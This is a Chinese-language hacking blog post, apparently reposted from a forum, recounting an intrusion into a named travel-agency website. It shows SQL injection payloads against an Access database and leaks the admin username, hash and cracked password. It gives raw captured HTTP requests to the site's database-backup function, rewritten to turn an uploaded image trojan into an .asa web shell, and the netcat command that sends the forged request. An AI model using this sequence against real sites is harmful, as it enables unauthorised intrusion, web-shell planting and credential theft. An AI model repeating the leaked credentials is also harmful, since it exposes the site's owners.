點評:這是我之前在綠色兵團時寫的一篇文章,是我自己原創的,思路借鑒瞭一篇t00ls裡的,進行瞭改進
這是我之前在綠色兵團時寫的一篇文章,是我自己原創的,思路借鑒瞭一篇t00ls裡的,進行瞭改進。我在綠色兵團的賬號名字也是leisureforest
真實性毋庸置疑,希望給過。thanks
數據庫抓包另類備份
地址http://www.jb51.net/(僅用於替代目標網站,非本站)
數據庫抓包另類備份
又是旅遊網。我剛才發瞭一篇文章,正想走,外面下雨瞭。實在是閑的難受。再寫這個,提提我人氣。
數據庫抓包另類備份
這個地址是一個傢夥發給我的,他說讓我試一試,我隨便找瞭個鏈接http://www.kmholiday.com/Travel/Travel_line_view.asp?lineid=1030’加瞭個特殊字符,馬上返回錯誤信息
數據庫抓包另類備份
Microsoft JET Database Engine
數據庫抓包另類備份
錯誤’80040e14′
語法錯誤(操作符丟失) 在查詢表達式’id=1030‘’ 中。
數據庫抓包另類備份
/Travel/Travel_line_view.asp,行 41
數據庫抓包另類備份
數據庫抓包另類備份
什麼意思嘛。這不明擺著讓我搞他。access的數據庫,直接上語句,and exists(select * from msysobjects)
數據庫抓包另類備份
數據庫抓包另類備份
Microsoft JET Database Engine
數據庫抓包另類備份
錯誤’80040e09′
數據庫抓包另類備份
不能讀取記錄;在’msysobjects’ 上沒有讀取數據權限。
數據庫抓包另類備份
/Travel/Travel_line_view.asp,行41
數據庫抓包另類備份
有這個表但是不能訪問。好的 接著執行and exists(select * from admin) 正常頁面 ;有admin表—- 帥
數據庫抓包另類備份
and exists(select count(user) from admin)還是正常頁面有user字段
數據庫抓包另類備份
and exists(select count(psw from admin) 正常頁面,密碼字段。
數據庫抓包另類備份
用戶名aidy 密碼28B9E7A5FADBDB964E9069BC82AC2AF9 32位加密的,嚇死我瞭。去MD5搞瞭下,汗19850311 奶奶的,真唬人。這時我就給那人發信息瞭,這個也太簡單瞭吧,還高什麼,他說,拿到shell才算。好吧接著搞。
數據庫抓包另類備份
找後臺,這個可真難住我瞭。先上工具,掃瞭四萬多條愣是沒找到。其實這種情況他肯定有個目錄很難差,根本不好搞,怎麼辦,還是google ,用瞭好幾個語句,隻找到倆登陸頁面但是都不對。還是回到首頁看圖片,但是右鍵不能使用,不讓查看屬性。最後下載的時候從迅雷裡看的地址。我真有辦法哈哈……
數據庫抓包另類備份
找到這個頁面瞭http://www.kmholiday.com/adminsheeninfo/直接跳轉登陸。
數據庫抓包另類備份
進去之後發現有數據庫備份。先找瞭個上傳,上傳瞭個圖片木馬正當我興致勃勃地來備份的時候,出問題瞭,原來備份路徑不能修改。也就是說你備份隻能備份mdb數據庫文件,備份之後的文件名為asa,這個倒是沒問題,iis可以解析,關鍵是路徑不讓動,這可難死我瞭,怎麼辦呢。還是右鍵查看源碼吧。找到瞭這個鏈接
數據庫抓包另類備份
http://www.jb51.net/ adminsheeninfo/Oledit/ewebeditor/汗,又是編輯器,編輯器啊編輯器,又是你,都不想搞瞭,進入編輯器,登陸頁面也沒有刪除。現在我寫文章的時候被刪瞭,我知道是誰刪的(不是我),不截圖瞭。進去還是那個用戶名密碼。找到樣式管理,原來的樣式保存按鈕被刪除瞭,他以為這樣就安全瞭。那麼我copy瞭一個樣式,在新創建的樣式裡,添加瞭asp格式。asa.但是都沒有成功,其實如果在這裡添加aaspsp就可以瞭,但是我沒想到他有這麼蠢的漏洞,我就沒這麼搞。難道我會拿不到shell。不可能。
數據庫抓包另類備份
於是我苦思冥想,終於想到瞭一句話木馬。後來一看人傢兩年前就有人想到這個方法瞭,就是在添加新聞那裡插入一個新聞抓下包,然後改新聞內容為自己的一句話nc提交、如下圖
數據庫抓包另類備份
抓包內容如下
數據庫抓包另類備份
POST /adminsheeninfo/Oledit/Upload.asp?action=remote&type=remote&style=s_light HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/QVOD, application/QVOD, */*
Referer: http://www.kmholiday.com/adminsh … s&style=s_light
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.kmholiday.com
Content-Length: 33
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: cck_lasttime=1312255680031; cck_count=0; ASPSESSIONIDSQQSDTTT=PNFACNHDBNBMAFNBNHHHBFCP
數據庫抓包另類備份
eWebEditor_UploadText=ggggggggggg看到最後這裡沒有隻抓到瞭內容沒抓到路徑,也就是說沒法訪問一句話,白玩瞭。
數據庫抓包另類備份
看來這個還真不好搞。這時我想還是得用那個後臺的備份,其實既然這裡可以抓包後臺那裡也可以抓包的,說幹就幹。
數據庫抓包另類備份
我點擊後臺數據庫備份,抓到的內容如下
數據庫抓包另類備份
POST /adminsheeninfo/DB_Manage.asp?action=BackupData&act=Backup HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/QVOD, application/QVOD, */*
Referer: http://www.kmholiday.com/adminsh … p?action=BackupData
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.kmholiday.com
Content-Length: 162
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: cck_lasttime=1312255680031; cck_count=0; ASPSESSIONIDSQQSDTTT=PNFACNHDBNBMAFNBNHHHBFCP
數據庫抓包另類備份
DBpath=%2Fadminsheeninfo%2Fdb%2Fweb_date_%23_sheenzhaoghsy%26%23@%21.mdb&bkfolder=..%2F..%2Fdatabase%2FDataBackup%2F&bkDBname=DB_BAK_20110802_1201247.asa&bknotes=
數據庫抓包另類備份
大傢看到最後這個鏈接沒有,這個事什麼意思呢,分析下先。DBpath=%2Fadminsheeninfo%2Fdb%2Fweb_date_%23_sheenzhaoghsy%26%23@%21.mdb這個是原來的數據庫名稱,%23是空格,%2f是/的編碼,轉換之後就是/adminsheeninfo/db/web_date_#_sheenzhaoghsy&#@!.mdb備份後的數據庫名稱就是=..%2F..%2Fdatabase%2FDataBackup%2F&bkDBname我們要修改原來的數據庫名稱為自己上傳的圖片馬,隨便一個吧,比如2011-8-2 12:07:04.jpg,我隨便寫的,吧原數據庫路徑改成這個,然後數出來原來的數據庫路徑的字符長度,比如是162(假設)我不數瞭,我記得當時數的是153,圖片是64,然後用153-64=89那麼就把原來的Content-Length: 162修改為89,然後用保存為qq.txt,文件名隨便起。保存為txt文檔。復制到c盤根目錄下面
數據庫抓包另類備份
用nc上傳(nc也要放到c盤根目錄)
數據庫抓包另類備份
命令nc www.kmholiday.com 80<qq.txt。上傳之後就會返回上傳成功的提示。如下
數據庫抓包另類備份
%2Fadminsheeninfo%2FOledit%2FUploadFile%2F2011730232015138.jpg 62
已經成功備份,你的數據庫的路徑:\hosting\wwwroot\kmholiday_cn\htdocs\adminsh eeninfo\../../database/DataBackup/\DB_BAK_20110730_231235.asa返回…
database/DataBackup/\DB_BAK_20110730_231235.asa
數據庫抓包另類備份
這個就是備份之後的Asp馬地址D:\hosting\wwwroot\kmholiday_cn\htdocs\adminsh eeninfo\../../database/DataBackup/\DB_BAK_20110730_231235.asa用俠客客服端連接一下就可以瞭,然後上傳自己的asp MM,訪問,我沒再截圖,這樣不好你懂的。
數據庫抓包另類備份
好啦,看來看似簡單的東西並不是那麼容易得到,切莫眼高收低,像我一樣,踏踏實實做事還是好些。
數據庫抓包另類備份